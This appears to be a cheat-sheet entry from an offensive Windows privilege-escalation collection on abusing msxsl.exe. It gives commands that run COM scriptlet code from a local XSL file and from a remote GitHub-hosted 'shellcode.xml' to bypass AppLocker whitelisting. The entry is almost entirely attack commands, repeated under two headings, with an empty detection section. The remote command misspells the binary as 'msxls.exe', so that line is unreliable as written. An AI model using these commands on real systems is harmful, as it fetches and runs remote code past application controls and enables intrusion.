~/Privilege Escalation/Windows/Binaries# cat msxsl.exe.md █
Command line utility used to perform XSL transformations.
Paths:
N/A
Detection:
Execute
Run COM Scriptlet code within the script.xsl file (local).
msxsl.exe customers.xml script.xsl
Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
AWL bypass
Run COM Scriptlet code within the script.xsl file (local).
msxsl.exe customers.xml script.xsl
Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml